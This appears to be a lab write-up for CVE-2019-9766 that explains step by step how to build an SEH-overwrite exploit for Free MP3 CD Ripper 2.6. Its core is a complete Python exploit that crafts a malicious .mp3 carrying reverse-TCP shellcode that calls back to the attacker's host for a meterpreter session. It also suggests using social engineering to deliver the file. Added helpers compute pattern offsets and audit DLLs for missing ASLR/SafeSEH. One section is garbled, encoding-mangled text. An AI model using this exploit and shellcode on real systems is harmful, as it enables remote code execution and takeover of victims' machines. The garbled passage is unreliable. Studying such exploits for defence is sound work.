Preface
CVE-2019-9766 discloses a buffer overflow vulnerability in Free MP3 CD Ripper: a stack-based buffer overflow in Free MP3 CD Ripper 2.6, triggered while converting a file, allows user-assisted remote attackers to execute arbitrary code via a crafted .mp3 file. This article describes in detail how the vulnerability was verified and how the exploit module was written and tested.
For details of the vulnerability, see: https://nvd.nist.gov/vuln/detail/CVE-2019-9766
Lab environment
- Attacking host: Kali-Linux-2019.1-vm-amd64
- Target host: CN_Windows7_x86_sp1
- Software version: Free MP3 CD Ripper 2.6
Tools used
- WinDbgx86-v6.12.2.633
- python-2.7.15
- ImmunityDebugger1.85
Procedure
1. Verifying the buffer overflow
(1) Generate a custom .mp3 file with Python; here 10000 'A' characters are written out as the .mp3 file. The code is as follows:
(2) Run FmcrExploit.py in Kali to generate TestFMCR.mp3, as shown in the figure below:
(3) Copy TestFMCR.mp3 to the target host, start Free MP3 CD Ripper, then start WinDbg and attach it to the process fcrip.exe (the Free MP3 CD Ripper process), as shown below:
(4) In Free MP3 CD Ripper click "Convert", select TestFMCR.mp3 and convert it, as shown below:
(5) Run the command g in WinDbg; the program raises an exception, as shown below:
(6) Run the command !exchain to inspect the SEH chain, as shown below:
After these six steps we have confirmed that the buffer overflow exists and that 10000 'A' characters overwrite the SEH record.
2. ±à䩶´ÀûÓóÌÐò
(1) ¶¨Î»³ÌÐòµÄÒç³öµã£¬¼´ÐèÒª¶àÉÙ¸ö×Ö·ûA²ÅÄܹ»¸²¸Çµ½SEH£¬Ê×ÏÈÉú³ÉÒ»¸ö³¤¶È10000ÇÒûÓÐÖظ´×Ö·ûµÄÎı¾£¬ÃüÁîÈçÏ£º
- root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 10000
ÄÚÈÝÌ«¶à£¬ÕâÀïÖ»½Øͼһ²¿·Ö£º
(2) ÓøÃÎı¾Ìæ»»FmcrExploit.pyÖеĔA”*10000£¬Öظ´²½Öè1.2£¬Éú³ÉTestFMCR.mp3Îļþ;
(3) Öظ´²½Öè1.3¡¢1.4¡¢1.5ºÍ1.6£¬·¢ÏÖPointer to next SEH record±»0×46326846¸²¸Ç£¬ÈçÏÂͼËùʾ£º
(4) ͨ¹ý0×46326846¶¨Î»³ÌÐòµÄÒç³öµã£¬¿ÉÒÔÖªµÀÖ»ÒªÌî³ä4116¸ö×Ö·û¾Í¿ÉÒÔ¸²¸Çµ½ Pointer to next SEH record£¬¾ßÌåÈçÏ£º
(5) ÑéÖ¤2.4Öеõ½µÄÒç³öµãÊÇ·ñÕýÈ·£¬½«FmcrExploit.pyÖеÄbuffer¸³ÖµÎª”A”*4116£¬Öظ´²½Öè1.2£¬Éú³ÉTestFMCR.mp3Îļþ£¬½«Îļþ¸´ÖƵ½Ä¿±êÖ÷»ú;
(6) ÔÚÄ¿±êÖ÷»úÖдò¿ªImmunityDebugger1.85£¬ÔËÐÐFree MP3 CD Ripper£¬convert²½Öè2.5ÖÐÉú³ÉµÄmp3Îļþ£¬µÃµ½ÈçϽá¹û£º
¿ÉÒÔ¿´µ½4116¸ö×Ö·ûAÕýºÃ¸²¸Çµ½ÁËPointer to next SEH record£¬¶¨Î»³É¹¦¡£
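The offset lookup in steps (3) and (4) relies on two facts that the screenshots leave implicit: the pattern from pattern_create.rb is built so that every 4-byte window is unique, and the DWORD the debugger prints (0x46326846) sat in memory little-endian, i.e. as the bytes "Fh2F". The following is an added example, not code from the write-up and not Metasploit's own code, that rebuilds the default pattern and reproduces the 4116 offset from the value shown above; the only inputs are the two numbers already quoted in the text.

```python
import string
import struct


def cyclic_pattern(length):
    """Rebuild the non-repeating string Metasploit's pattern_create.rb emits with its
    default charset: (upper, lower, digit) triples in lexical order, cut to `length` bytes.
    Every 4-byte window is unique, so an overwritten DWORD maps back to exactly one offset."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("default charset is exhausted after 20280 bytes")
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def as_memory_bytes(dword):
    """x86 is little-endian: a value the debugger shows as 0x46326846 was stored as the
    bytes 46 68 32 46 (b"Fh2F"). The same packing is what turns an address into the four
    bytes that are written into a file or payload."""
    return struct.pack("<I", dword)


def pattern_offset(dword, length=10000):
    """Mirror of pattern_offset.rb: byte position of the overwritten DWORD in the pattern.
    Returns -1 when the value is not part of the pattern (the overwrite then did not come
    from our data, which is the first thing to check before trusting an offset)."""
    return cyclic_pattern(length).find(as_memory_bytes(dword))


if __name__ == "__main__":
    # Value taken from the write-up: nSEH read 0x46326846 after the crash.
    crash_value = 0x46326846
    print("memory bytes: %r" % as_memory_bytes(crash_value))
    print("nSEH is overwritten at offset %d" % pattern_offset(crash_value))
```

The -1 case matters in practice: if the DWORD is not found, the crash was not caused by the pattern bytes (a pointer was corrupted indirectly, or the buffer was transformed before the copy), and the offset has to be located another way.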
(7) The Pointer to next SEH record (nSEH for short) points to the next SEH structure. Here it is filled with "\xeb\x06\x90\x90". These four bytes disassemble to three instructions: jmp 6, nop, nop. jmp 6 jumps forward 6 bytes, which skips exactly the two nops and the 4-byte SEH handler address, so execution lands in the nop sled and slides into the shellcode.
(8) In this example SEH and nSEH have to be used together to complete the whole overflow; the flow is as follows:
(9) Finding a pop pop ret sequence of three consecutive instructions is a difficult point. On XP this was much simpler, but Windows 7 and later added protections such as SafeSEH and ASLR. There are always more solutions than problems. Run the command !mona seh in ImmunityDebugger1.85; the result:
(10) The output of !mona seh is written to seh.txt (in the ImmunityDebugger1.85 installation directory). It contains the following entry:
This pop pop ret sequence lives in a DLL shipped with the software (C:\Program Files\Free MP3 CD Ripper\ogg.dll). Do not use DLLs that ship with the system, as they may be protected by ASLR or SafeSEH. We can now set SEH in FmcrExploit.py to "\x84\x20\xe4\x66".
Note: the byte order of an address inside the CPU (x86 is little-endian) is the reverse of network byte order. The address the CPU sees as "0x66e42084" therefore has to be sent as "0x8420e466", i.e. as the bytes 84 20 e4 66.
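The reason a vendor DLL such as ogg.dll is chosen in step (10) is that it was linked without the mitigations Windows 7 offers: no ASLR opt-in (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) and no SafeSEH handler table (registered through the Load Config directory). That is exactly the property a hardening review of shipped modules should flag. The following is an added example, not code from the write-up and not mona's code: a small parser of the PE headers that reports those bits, plus a helper that builds two constructed minimal PE32 headers so the check runs offline. Flag values and directory index come from the PE/COFF specification; the sample headers have no sections and are not real files.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits (PE/COFF specification)
DYNAMIC_BASE = 0x0040   # module opted into ASLR
NX_COMPAT = 0x0100      # module opted into DEP
NO_SEH = 0x0400         # image declares it uses no SEH handlers at all
LOAD_CONFIG_DIR = 10    # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG, where /SAFESEH registers its table


def pe_mitigations(data):
    """Read the SEH-relevant mitigation bits from a PE image's headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                     # IMAGE_FILE_HEADER (20 bytes)
    machine = struct.unpack_from("<H", data, coff)[0]
    opt = coff + 20                         # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                      # PE32: data directories start at +96
        dirs = opt + 96
    elif magic == 0x20B:                    # PE32+: data directories start at +112
        dirs = opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # DllCharacteristics
    n_dirs = struct.unpack_from("<I", data, dirs - 4)[0]      # NumberOfRvaAndSizes
    loadcfg_size = 0
    if n_dirs > LOAD_CONFIG_DIR:
        _, loadcfg_size = struct.unpack_from("<II", data, dirs + 8 * LOAD_CONFIG_DIR)
    return {
        "machine": machine,
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "dep": bool(dll_chars & NX_COMPAT),
        "no_seh": bool(dll_chars & NO_SEH),
        # A present Load Config directory is where SEHandlerTable lives; its absence on a
        # 32-bit module means the loader accepts any address in it as an SEH handler.
        "safeseh_table": loadcfg_size > 0,
    }


def lacks_seh_mitigations(report):
    """True for a 32-bit module with no ASLR, no NO_SEH flag and no handler table:
    the kind of module !mona seh lists and a hardening audit should reject."""
    return (report["machine"] == 0x14C and not report["aslr"]
            and not report["no_seh"] and not report["safeseh_table"])


def build_sample_pe32(dll_chars, loadcfg_size):
    """Constructed minimal PE32 header (no sections) used only to exercise the parser."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)  # i386, 224-byte opt hdr
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 92, 16)                       # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_DIR,
                     0x1000 if loadcfg_size else 0, loadcfg_size)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    for name, blob in (("weak.dll", build_sample_pe32(0, 0)),
                       ("hardened.dll", build_sample_pe32(DYNAMIC_BASE | NX_COMPAT, 0x40))):
        r = pe_mitigations(blob)
        print(name, r, "-> usable as SEH handler host:", lacks_seh_mitigations(r))
```

Two caveats for real files: a non-empty Load Config directory only shows that a table can be present, and the definitive SafeSEH check reads SEHandlerTable and SEHandlerCount inside it; and on a running system the effective ASLR state also depends on the OS-wide policy, so the header bits are the build-time part of the audit, not the whole story.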
(11) Build a shellcode; here a reverse TCP shellcode is generated as follows:
(12) Step 2.11 shows that the generated shellcode is 341 bytes, so we need to check whether the buffer is large enough to hold it. Using the ImmunityDebugger1.85 output we calculate the buffer size; the debugger output (abridged) is:
040AFEBC 040AFEE8 èþ. Pointer to next SEH record
040AFEC0 004955CB ËUI. SE handler
040AFEC4 040AFED4 Ôþ.
......
040AFEE4 |00492C1A ,I. RETURN to fcrip.00492C1A
040AFEE8 |040AFF24 $ÿ. Pointer to next SEH record
040AFEEC |00492C24 $,I. SE handler
......
040AFFC4 |FFFFFFFF ÿÿÿÿ End of SEH chain
040AFFC8 |7769E0ED íàiw SE handler
......
040AFFF4 004047F4 ôG@. fcrip.004047F4
040AFFF8 01483044 D0H
040AFFFC 00000000 ....
0x040AFFFC - 0x040AFEC4 = 0x138, which is 312 in decimal, so the buffer is 312 + 4 = 316 bytes. Obviously 316 bytes cannot hold a 341-byte shellcode.
(13) Is this the end of the road? There are always more solutions than problems: we can try compressing the shellcode, as follows:
After compression the shellcode is 283 bytes and fits entirely in the buffer.
(14) Putting all of the above together, edit FmcrExploit.py as follows (Python 2.7):
    # Stack-based buffer overflow in Free MP3 CD Ripper 2.6
    buffer = "A" * 4116            # padding up to the Pointer to next SEH record
    NSEH = "\xeb\x06\x90\x90"      # jmp 6, nop, nop: skip over the SEH handler address
    SEH = "\x84\x20\xe4\x66"       # pop pop ret at 0x66e42084 in ogg.dll (little-endian)
    nops = "\x90" * 5
    buf = ""
    buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
    buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    buf += "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
    buf += "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
    buf += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
    buf += "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
    buf += "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
    buf += "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
    buf += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
    buf += "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
    buf += "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
    buf += "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x6e\x84"
    buf += "\x68\x02\x00\x22\xb8\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
    buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
    buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
    buf += "\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8"
    buf += "\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"
    buf += "\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68"
    buf += "\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"
    pad = "B" * (316 - len(nops) - len(buf))   # fill the remaining 316-byte buffer
    payload = buffer + NSEH + SEH + nops + buf + pad
    try:
        f = open("TestFMCR.mp3", "w")
        print "[+] Creating %s bytes mp3 File..." % len(payload)
        f.write(payload)
        f.close()
        print "[+] mp3 File created successfully!"
    except:
        print "File cannot be created!"
3. Testing the exploit module
(1) Start a listener in msfconsole on Kali and wait for the target host to connect back, as shown below:
(2) Copy the TestFMCR.mp3 generated by the final FmcrExploit.py to the target host, start Free MP3 CD Ripper and convert the mp3 file. A meterpreter session is then established, as shown below:
With that, the exploit module for the Free MP3 CD Ripper 2.6 buffer overflow has been written and tested successfully. In a real engagement, social engineering may also be needed to get the mp3 file onto the target host.
¡¾±à¼ÍƼö¡¿